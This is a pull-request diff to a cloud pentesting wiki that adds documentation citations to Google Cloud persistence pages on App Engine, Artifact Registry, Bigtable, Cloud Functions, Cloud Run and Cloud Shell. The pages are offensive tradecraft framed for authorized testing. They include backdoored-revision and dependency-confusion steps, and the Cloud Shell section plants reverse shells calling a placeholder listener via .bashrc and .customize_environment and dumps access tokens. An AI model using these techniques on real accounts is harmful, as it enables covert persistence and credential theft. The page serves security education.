### PR TITLE
Add provenance citations to cloud pages 101-150

### DIFF
--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
@@ -1,7 +1,5 @@
 # GCP - API Keys Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## API Keys
 
 For more information about API Keys check:
@@ -19,6 +17,4 @@ Check how to do this in:
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
@@ -1,7 +1,5 @@
 # GCP - App Engine Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## App Engine
 
 For more information about App Engine check:
@@ -12,13 +10,31 @@ For more information about App Engine check:
 
 ### Modify code
 
-If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
+If you can deploy the App Engine service, you can introduce unauthorized code by deploying a new version or replacing a named version. The `gcloud app deploy` command deploys application code and configuration; `--version` creates or replaces the named version, while `--no-promote` prevents that version from automatically receiving all traffic.<sup>[[1]](#references)</sup>
 
-### Old version persistence
+### Older-version persistence
 
-**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
+Do not assume that every deployed version serves user traffic. A version deployed with `--no-promote` can remain available at its version-specific hostname while the existing traffic assignment stays in place, and service traffic can be split across versions. This means a backdoored version can retain a small traffic allocation while a legitimate version handles the rest.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> The deployment command also has a separate `--stop-previous-version` control.<sup>[[1]](#references)</sup> Treat a later legitimate deployment as insufficient cleanup; inspect and remove unauthorized versions.
+
+For an authorized assessment, deploy the version without promoting it and then configure an explicit split if the test requires the version to receive traffic:<sup>[[1]](#references)[[2]](#references)</sup>
+
+```bash
+gcloud app deploy app.yaml \
+  --version BACKDOORED_VERSION \
+  --no-promote
+
+gcloud app services set-traffic SERVICE \
+  --splits=LEGIT_VERSION=.9,BACKDOORED_VERSION=.1 \
+  --split-by=cookie
+```
+
+The version-specific URL follows `https://VERSION_ID-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com`.<sup>[[3]](#references)</sup>
+
+## References
+
+- [1] [gcloud app deploy](https://cloud.google.com/sdk/gcloud/reference/app/deploy)
+- [2] [gcloud app services set-traffic](https://cloud.google.com/sdk/gcloud/reference/app/services/set-traffic)
+- [3] [Test and deploy your application | App Engine standard environment](https://cloud.google.com/appengine/docs/standard/testing-and-deploying-your-app)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
@@ -1,7 +1,5 @@
 # GCP - Artifact Registry Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Artifact Registry
 
 For more information about Artifact Registry check:
@@ -12,26 +10,28 @@ For more information about Artifact Registry check:
 
 ### Dependency Confusion
 
-- What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both?
-  - The one with the **highest priority set in the virtual repository** is used
-  - If the **priority is the same**:
-    - If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used
-    - If not, the **highest version** is used
+Artifact Registry virtual repositories expose one endpoint for downloading, installing, or deploying artifacts from one or more upstream standard or remote repositories. Each upstream has an integer priority: a higher value takes precedence when a requested artifact exists in multiple upstreams. If upstreams have the same priority, Artifact Registry may serve the artifact from any of them; it does not document an alphabetical policy-name or highest-version tie-breaker.<sup>[[1]](#references)[[2]](#references)</sup>
+
+Google Cloud describes dependency confusion as a mixed private/public repository configuration in which an attacker uploads a new package version with bad code to a public repository and a client selects that version. The recommended design is a remote repository that proxies the public registry, a standard repository for private packages, and a virtual repository that prioritizes the standard repository. Configure package managers and other clients to use only the virtual repository; if a client also searches a public index, its own selection logic can still choose the latest version regardless of the source repository.<sup>[[1]](#references)[[4]](#references)</sup>
 
 > [!CAUTION]
-> Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority
+> A vulnerable setup can let a public remote upstream win package selection when it has a higher priority than the private upstream, or when a client searches multiple indexes. An attacker needs to publish a package under the internal package's name in the relevant public registry, but this is a package supply-chain attack against authorized consumers—not an unauthenticated Artifact Registry access bypass. Equal upstream priorities do not guarantee that the remote repository is selected, and a remote repository can serve a cached copy after its first request, so both tie behavior and cache state matter.<sup>[[1]](#references)[[4]](#references)</sup>
 
-This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version.
+For an authorized assessment, the persistence path is:
 
-For persistence these are the steps you need to follow:
+1. **Requirements**: A virtual repository must be in use by the consumers, and the target package name must be an internal name that is not claimed in the public registry used by the remote upstream (or otherwise be publishable by the assessor). If the remote upstream is already configured with an unsafe priority, the package-publication step is the relevant dependency-confusion path; changing the virtual repository policy requires permission to update the repository.<sup>[[1]](#references)[[3]](#references)</sup>
+2. Create a remote repository that proxies the relevant public registry if one does not already exist, then add it as an upstream of the virtual repository.<sup>[[1]](#references)[[2]](#references)</sup>
+3. Edit the virtual repository's upstream policy so that the public remote has a higher priority than the private standard repository for a controlled test. Do not rely on equal priorities for a deterministic result.<sup>[[1]](#references)[[2]](#references)</sup>
+4. Apply the complete upstream policy file to the virtual repository:
 
-- **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used.
-- Create a remote repository if it doesn't exist
-- Add the remote repository to the virtual repository
-- Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\
-  Run something like:
-  - [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
-- Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours!
+   ```bash
+   gcloud artifacts repositories update <VIRTUAL-REPOSITORY> \
+     --location=<LOCATION> \
+     --upstream-policy-file=<UPSTREAM_POLICY_FILE>
+   ```
+
+   The `--upstream-policy-file` flag updates upstreams for virtual repositories; ensure the file contains the intended standard and remote entries with their priorities.<sup>[[2]](#references)[[3]](#references)</sup>
+5. In a dedicated test registry, create a package under the same name with a version higher than the internal package, preserve the expected interface, and use a benign marker to demonstrate impact before publishing it to the public upstream. A real attack would replace that marker with malicious installation or runtime behavior. A remote repository fetches and caches a package version on its first request, then serves the cached copy on later requests, so test with a version that is not already cached.<sup>[[1]](#references)[[4]](#references)</sup>
 
 For more information about dependency confusion check:
 
@@ -39,7 +39,11 @@ For more information about dependency confusion check:
 https://book.hacktricks.wiki/en/pentesting-web/dependency-confusion.html
 {{#endref}}
 
+## References
+
+- [1] [Virtual repositories overview | Artifact Registry](https://cloud.google.com/artifact-registry/docs/repositories/virtual-overview)
+- [2] [Create virtual repositories | Artifact Registry](https://cloud.google.com/artifact-registry/docs/repositories/virtual-repo)
+- [3] [gcloud artifacts repositories update](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update)
+- [4] [Remote repositories overview | Artifact Registry](https://cloud.google.com/artifact-registry/docs/repositories/remote-overview)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
@@ -1,7 +1,5 @@
 # GCP - BigQuery Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## BigQuery
 
 For more information about BigQuery check:
@@ -19,6 +17,3 @@ Grant further access over datasets, tables, rows and columns to compromised user
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md
@@ -1,7 +1,5 @@
 # GCP - Bigtable Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Bigtable
 
 For more information about Bigtable check:
@@ -12,9 +10,9 @@ For more information about Bigtable check:
 
 ### Dedicated attacker App Profile
 
-**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.
+**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.<sup>[[7]](#references)</sup>
 
-Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
+Create a standard app profile that limits multi-cluster routing to the cluster you control. The cluster group is selected with `--restrict-to`, while `--row-affinity` provides row-key-based routing for supported single-row requests.<sup>[[1]](#references)</sup>
 
 <details>
 
@@ -24,21 +22,26 @@ Create an app profile that routes traffic to your replica cluster and enable Dat
 gcloud bigtable app-profiles create stealth-profile \
   --instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
   --row-affinity --description="internal batch"
-
-gcloud bigtable app-profiles update stealth-profile \
-  --instance=<instance-id> --data-boost \
-  --data-boost-compute-billing-owner=HOST_PAYS
 ```
 
 </details>
 
-As long as this profile exists you can reconnect using fresh credentials that reference it.
+If the workload is an eligible high-throughput read, convert the profile to Data Boost and keep the explicit single-cluster target:<sup>[[1]](#references)[[2]](#references)</sup>
+
+```bash
+gcloud bigtable app-profiles update stealth-profile \
+  --instance=<instance-id> --data-boost \
+  --data-boost-compute-billing-owner=HOST_PAYS \
+  --route-to=<attacker-cluster>
+```
+
+Data Boost uses serverless compute instead of provisioned-node compute, but it is read-only: writes and deletes, multi-cluster routing, and several other workloads are not supported. The app profile ID is permanent and can be selected by later clients with valid IAM access; the profile itself is a routing configuration, not an IAM grant.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
 
 ### Maintain your own replica cluster
 
-**Permissions:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.
+**Permissions:** `bigtable.clusters.create` to add the cluster, `bigtable.clusters.get` to describe it, `bigtable.clusters.list` to enumerate clusters, and `bigtable.clusters.update` to resize it.<sup>[[7]](#references)</sup>
 
-Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
+Provision a minimal node-count cluster in a quiet region. When a cluster is added, Bigtable copies existing data and then synchronizes changes, creating a separate copy of the instance's data; replication is eventually consistent, so the copy can lag.<sup>[[3]](#references)</sup>
 
 <details>
 
@@ -51,13 +54,22 @@ gcloud bigtable clusters create dark-clone \
 
 </details>
 
-Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
+Keep an eye on its state with `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` and verify replication before relying on the copy. The cluster remains an instance resource rather than an attachment to the creating credential, but subsequent data access still depends on IAM and the instance's lifecycle controls.<sup>[[3]](#references)[[7]](#references)[[8]](#references)</sup>
+
+If more capacity is needed before a later read, resize the cluster and wait for it to become ready rather than assuming that scaling is instantaneous:<sup>[[7]](#references)[[9]](#references)</sup>
+
+```bash
+gcloud bigtable clusters update dark-clone \
+  --instance=<instance-id> --num-nodes=<node-count>
+```
 
 ### Lock replication behind your own CMEK
 
-**Permissions:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` on the attacker-owned key.
+**Permissions and prerequisites:** `bigtable.clusters.create`; the Bigtable service agent for the resource project must have the Cloud KMS Encrypter/Decrypter role on the key, and the key must be regional and in the same region as the cluster.<sup>[[5]](#references)[[7]](#references)</sup>
 
-Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
+Bring your own KMS key when spinning up a clone. If the key becomes inaccessible, Bigtable disables clusters and data operations fail; re-enabling the key can restore access, but leaving it inaccessible for more than 30 consecutive days can cause the protected cluster to be automatically deleted.<sup>[[6]](#references)</sup>
+
+The `gcloud bigtable clusters create` command accepts the fully qualified key resource through `--kms-key`.<sup>[[4]](#references)</sup>
 
 <details>
 
@@ -71,6 +83,18 @@ gcloud bigtable clusters create cmek-clone \
 
 </details>
 
-Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
+An operator controlling the key can use its lifecycle as a recovery gate: Bigtable may take up to several hours to detect a disablement, after which the cluster is disabled; re-enabling the key can restore access. Do not leave the key inaccessible as a long-term state because Bigtable can delete the protected cluster after 30 consecutive days.<sup>[[5]](#references)[[6]](#references)</sup>
+
+## References
+
+- [1] [Create and configure app profiles](https://docs.cloud.google.com/bigtable/docs/configuring-app-profiles)
+- [2] [Bigtable Data Boost overview](https://docs.cloud.google.com/bigtable/docs/data-boost-overview)
+- [3] [Replication overview](https://docs.cloud.google.com/bigtable/docs/replication-overview)
+- [4] [gcloud bigtable clusters create](https://docs.cloud.google.com/sdk/gcloud/reference/bigtable/clusters/create)
+- [5] [Use customer-managed encryption keys (CMEK)](https://docs.cloud.google.com/bigtable/docs/use-cmek)
+- [6] [Customer-managed encryption keys (CMEK)](https://docs.cloud.google.com/bigtable/docs/cmek)
+- [7] [Bigtable roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/bigtable)
+- [8] [gcloud bigtable clusters describe](https://docs.cloud.google.com/sdk/gcloud/reference/bigtable/clusters/describe)
+- [9] [gcloud bigtable clusters update](https://docs.cloud.google.com/sdk/gcloud/reference/bigtable/clusters/update)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
@@ -1,7 +1,5 @@
 # GCP - Cloud Functions Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Functions
 
 For more info about Cloud Functions check:
@@ -12,11 +10,17 @@ For more info about Cloud Functions check:
 
 ### Persistence Techniques
 
-- **Modify the code** of the Cloud Function, even just the `requirements.txt`
-- **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
-- **Trigger** a Cloud Function when something happens to infect something
+- **Backdoor the source or dependencies:** An identity able to update a function can replace its handler with a backdoor and redeploy it. Cloud Run function deployments build a container image from the function source with buildpacks and Cloud Build, and the deployment workflow supports redeploying modified source code.<sup>[[1]](#references)</sup> For Python functions, the root `requirements.txt` defines dependencies installed by the buildpack, so adding or replacing a dependency can carry code into the next deployment when the function imports or otherwise executes it.<sup>[[2]](#references)</sup> The relevant Cloud Functions API permissions include `cloudfunctions.functions.update` and `cloudfunctions.functions.sourceCodeSet`; deployment also requires the appropriate service-account permissions for the runtime and build service accounts.<sup>[[3]](#references)</sup>
+- **Expose an HTTP backdoor:** An HTTP function can be made reachable without caller authentication by allowing unauthenticated invocation. For Cloud Functions v2, Google documents the `--allow-unauthenticated` deployment option and granting `roles/run.invoker` to `allUsers` after deployment; the corresponding 1st-gen invoker role is `roles/cloudfunctions.invoker`. Changing these bindings requires `cloudfunctions.functions.setIamPolicy`.<sup>[[3]](#references)[[4]](#references)</sup>
+- **Use an event trigger:** Deploy or reuse a function trigger so the backdoor runs when an event occurs instead of requiring a manual call. Supported paths include Eventarc-backed Pub/Sub, Cloud Storage, and Firestore events, plus HTTP requests from services such as Cloud Scheduler or Cloud Tasks.<sup>[[5]](#references)</sup>
+
+## References
+
+- [1] [Deploy a Cloud Run function](https://docs.cloud.google.com/run/docs/deploy-functions)
+- [2] [Specify dependencies in Python](https://docs.cloud.google.com/run/docs/runtimes/python-dependencies)
+- [3] [Cloud Functions IAM Roles](https://docs.cloud.google.com/functions/docs/reference/iam/roles)
+- [4] [Authorize access with IAM](https://docs.cloud.google.com/functions/docs/securing/managing-access-iam)
+- [5] [Cloud Run function triggers](https://docs.cloud.google.com/run/docs/function-triggers)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
@@ -1,7 +1,5 @@
 # GCP - Cloud Run Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Run
 
 For more information about Cloud Run check:
@@ -10,19 +8,84 @@ For more information about Cloud Run check:
 ../gcp-services/gcp-cloud-run-enum.md
 {{#endref}}
 
+Use the following techniques only in an authorized assessment and with a controlled image or job definition. Deployment, traffic changes, and IAM changes affect the target resource and require the appropriate Cloud Run permissions; attaching a service identity may also require Service Account User permissions.<sup>[[2]](#references)[[3]](#references)</sup>
+
 ### Backdoored Revision
 
-Create a new backdoored revision of a Run Service and split some traffic to it.
+Cloud Run creates an immutable revision when a service is deployed or its configuration changes. If an image tag is used, Cloud Run resolves that tag to a digest for the revision, so replacing the tag later does not change an already deployed revision.<sup>[[1]](#references)[[4]](#references)</sup>
+
+Deploy a controlled image without changing the service's current traffic, inspect the new revision, and then assign it a small traffic share when the assessment requires it. A tag gives direct access to a revision for testing without sending general service traffic to it.<sup>[[2]](#references)[[4]](#references)</sup>
+
+```bash
+gcloud run deploy SERVICE \
+  --image=IMAGE \
+  --region=REGION \
+  --no-traffic \
+  --tag=assessment
+
+gcloud run revisions list \
+  --service=SERVICE \
+  --region=REGION
+
+gcloud run services update-traffic SERVICE \
+  --region=REGION \
+  --to-revisions=LEGIT_REVISION=99,BACKDOOR_REVISION=1
+```
+
+Traffic updates are not instantaneous, and in-flight requests can complete during the transition. Once a test is complete, return all traffic to the known-good revision, remove the test tag, and delete the unauthorized revision if it is no longer needed. Cloud Run preserves an explicitly configured split for later deployments, so leaving the split in place can unintentionally keep the old revision receiving traffic.<sup>[[2]](#references)[[4]](#references)</sup>
+
+```bash
+gcloud run services update-traffic SERVICE \
+  --region=REGION \
+  --to-revisions=LEGIT_REVISION=100
+
+gcloud run services update-traffic SERVICE \
+  --region=REGION \
+  --remove-tags=assessment
+
+gcloud run revisions delete BACKDOOR_REVISION \
+  --region=REGION
+```
 
 ### Publicly Accessible Service
 
-Make a Service publicly accessible
+Cloud Run supports public access by assigning the Cloud Run Invoker role to `allUsers` (anyone on the internet). The following changes the service IAM policy; use it only when public invocation is explicitly in scope, and restore the previous policy afterward.<sup>[[3]](#references)[[5]](#references)</sup>
+
+```bash
+gcloud run services add-iam-policy-binding SERVICE \
+  --region=REGION \
+  --member="allUsers" \
+  --role="roles/run.invoker"
+```
 
 ### Backdoored Service or Job
 
-Create a backdoored Service or Job
+For a service, use the revision workflow above: redeploy the controlled image to the existing service and decide explicitly whether the revision should receive zero, partial, or all traffic. A service image tag by itself is not a persistence mechanism because the deployed revision keeps the resolved image digest.<sup>[[1]](#references)[[2]](#references)</sup>
+
+Unlike a service, a Cloud Run job does not listen for or serve requests. A job can still persist an unauthorized container image or command in its definition; update the job and execute it for an authorized test, or allow an existing schedule or workflow to invoke it. Job executions produce Cloud Logging and Cloud Monitoring data, so review those records during the assessment.<sup>[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+
+Use `--wait` when the assessment needs the CLI to wait for the execution to finish.<sup>[[9]](#references)</sup>
+
+```bash
+gcloud run jobs update JOB \
+  --image=BACKDOOR_IMAGE \
+  --region=REGION
+
+gcloud run jobs execute JOB \
+  --region=REGION \
+  --wait
+```
+
+## References
+
+- [1] [Deploy container images to Cloud Run services](https://docs.cloud.google.com/run/docs/deploying)
+- [2] [Rollbacks, gradual rollouts, and traffic migration](https://docs.cloud.google.com/run/docs/rollouts-rollbacks-traffic-migration)
+- [3] [Allowing public (unauthenticated) access](https://docs.cloud.google.com/run/docs/authenticating/public)
+- [4] [Manage revisions](https://docs.cloud.google.com/run/docs/managing/revisions)
+- [5] [gcloud run services add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/run/services/add-iam-policy-binding)
+- [6] [Create jobs](https://docs.cloud.google.com/run/docs/create-jobs)
+- [7] [gcloud run jobs update](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/update)
+- [8] [Execute jobs](https://docs.cloud.google.com/run/docs/execute/jobs)
+- [9] [gcloud run jobs execute](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/execute)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -1,7 +1,5 @@
 # GCP - Cloud Shell Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Shell
 
 For more information check:
@@ -12,79 +10,99 @@ For more information check:
 
 ### Persistent Backdoor
 
-[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
+[Google Cloud Shell](https://cloud.google.com/shell/) provides a managed, temporary shell environment for Google Cloud that users can open from the Google Cloud console. Google lists Cloud Shell, including its 5 GB persistent disk, as free access under the Google Cloud Free Tier. The supported <code>gcloud cloud-shell ssh</code> command can establish an interactive SSH session, and the Cloud Shell virtual machine is managed outside the user's Google Cloud projects. <sup>[[4]](#references)[[7]](#references)[[13]](#references)[[15]](#references)</sup>
 
-You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
+The virtual machine is disposable, but the default experience mounts 5 GB of per-user persistent storage at <code>$HOME</code>. Files stored there, including <code>.bashrc</code> and other scripts, persist across sessions; Google deletes that home directory after 120 days without Cloud Shell access. Organizations control whether their users can access Cloud Shell, and Google documents anonymized terminal usage statistics. <sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
-This console has some interesting capabilities for attackers:
+For an authorized assessment, this means that a compromised user's home directory can retain shell-startup code even after the backing VM is recreated. The persistence is still dependent on the victim using Cloud Shell before the 120-day cleanup, and any Google Cloud permissions obtained by a callback are those of the authorized session rather than an automatic organization-wide privilege. <sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[13]](#references)</sup>
 
-1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
-2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
-3. There is **no capabilities for an organisation to monitor** the activity of that instance.
+### Persistence through <code>.bashrc</code>
 
-This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
+Because <code>.bashrc</code> is persistent and is read when an interactive Bash shell starts, a malicious line in it can launch a callback whenever the user opens a shell. The following is an illustrative callback for a controlled lab; replace the placeholder only with an authorized listener. <sup>[[1]](#references)[[5]](#references)</sup>
 
 <details>
 
-<summary>Add reverse shell to .bashrc</summary>
+<summary>Add a reverse shell to <code>.bashrc</code> (authorized lab only)</summary>
 
-```bash
-echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
-```
+~~~bash
+CCSERVER='<LISTENER-ADDR>'
+printf '%s\n' "(nohup /usr/bin/env -i /bin/bash -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)" >> "$HOME/.bashrc"
+~~~
 
 </details>
 
-There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
+### Persistence through <code>.customize_environment</code>
+
+Cloud Shell automatically runs <code>$HOME/.customize_environment</code> once when the instance boots, rather than once for each login shell. The script runs as root in the Cloud Shell environment and in the background, so a file planted in the persistent home directory can launch code at boot. <sup>[[5]](#references)[[13]](#references)</sup>
+
+The following dependency-free Bash example demonstrates the same callback concept without relying on distribution-specific <code>netcat -e</code> behavior. Use it only in an authorized, disposable environment. <sup>[[4]](#references)[[13]](#references)</sup>
 
 <details>
 
-<summary>Create .customize_environment backdoor</summary>
+<summary>Create a <code>.customize_environment</code> callback (authorized lab only)</summary>
 
-```bash
+~~~bash
 #!/bin/sh
-apt-get install netcat -y
-nc <LISTENER-ADDR> 443 -e /bin/bash
-```
+CCSERVER='<LISTENER-ADDR>'
+nohup /bin/bash -c "exec /bin/bash -i >& /dev/tcp/$CCSERVER/443 0>&1" >/dev/null 2>&1 &
+~~~
 
 </details>
 
 > [!WARNING]
-> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
+> A callback that modifies a user's startup files is persistence in a managed environment, not a supported Cloud Shell configuration. Remove the file and reset affected credentials after an authorized test or suspected compromise.
 
-This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
+### Authorization and tokens
 
-<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
+The first Google Cloud API call or command-line tool that needs credentials in a Cloud Shell session can trigger an authorization prompt in the browser, and the user must approve it before the command runs. An unexpected prompt can therefore expose the activity. <sup>[[4]](#references)[[13]](#references)</sup>
 
-However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
+<figure><img src="../../../images/image (10).png" alt="Cloud Shell authorization prompt"><figcaption></figcaption></figure>
+
+After authorization, <code>gcloud auth print-access-token</code> prints an access token for the active account. <code>gcloud auth application-default print-access-token</code> prints a token for configured Application Default Credentials; it is not a substitute for configuring ADC. <sup>[[8]](#references)[[9]](#references)</sup>
 
 <details>
 
-<summary>Get access tokens from Cloud Shell</summary>
+<summary>Inspect the current Cloud Shell credentials (authorized testing)</summary>
 
-```bash
+~~~bash
 gcloud auth print-access-token
 gcloud auth application-default print-access-token
-```
+~~~
 
 </details>
 
-#### How the SSH connection is stablished
+### How the SSH connection is established
 
-Basically, these 3 API calls are used:
+For normal access, use <code>gcloud cloud-shell ssh</code>; it starts the environment when necessary before establishing the interactive session. <sup>[[7]](#references)</sup>
 
-- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
-- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
-- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
+For manual or programmatic workflows, the current Cloud Shell REST API exposes these operations. The requests require an OAuth token with the Cloud Shell API's <code>cloud-platform</code> scope. <sup>[[10]](#references)[[11]](#references)[[12]](#references)</sup>
 
-But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+- <code>POST https://cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey</code> adds a public SSH key; a client needs the corresponding private key to connect. <sup>[[10]](#references)</sup>
+- <code>POST https://cloudshell.googleapis.com/v1/users/me/environments/default:start</code> starts the existing environment and can receive an access token and public keys in its request body. <sup>[[11]](#references)</sup>
+- <code>GET https://cloudshell.googleapis.com/v1/users/me/environments/default</code> returns environment metadata, including the SSH host and port. <sup>[[12]](#references)</sup>
+
+The original private-key walkthrough is available in the [Google-cloud-shell-hacking repository](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key); use the current API operations above when validating the workflow.<sup>[[2]](#references)</sup>
+
+### Mitigation
+
+For managed Google Workspace or Cloud Identity accounts, administrators can disable Cloud Shell access. During incident response, resetting the Cloud Shell VM restores a clean home directory but permanently deletes files stored there. <sup>[[14]](#references)</sup>
 
 ## References
 
-- [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
-- [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
-- [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
+- [1] [Persistent GCP backdoors with Google's Cloud Shell](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
+- [2] [Google Cloud Shell Hacking](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+- [3] [How an attacker can achieve persistence in Google Cloud Platform (GCP) with Cloud Shell](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
+- [4] [How Cloud Shell works](https://docs.cloud.google.com/shell/docs/how-cloud-shell-works)
+- [5] [Configure Cloud Shell](https://docs.cloud.google.com/shell/docs/configuring-cloud-shell)
+- [6] [Quotas and limits](https://docs.cloud.google.com/shell/docs/quotas-limits)
+- [7] [gcloud cloud-shell ssh](https://docs.cloud.google.com/sdk/gcloud/reference/cloud-shell/ssh)
+- [8] [gcloud auth print-access-token](https://docs.cloud.google.com/sdk/gcloud/reference/auth/print-access-token)
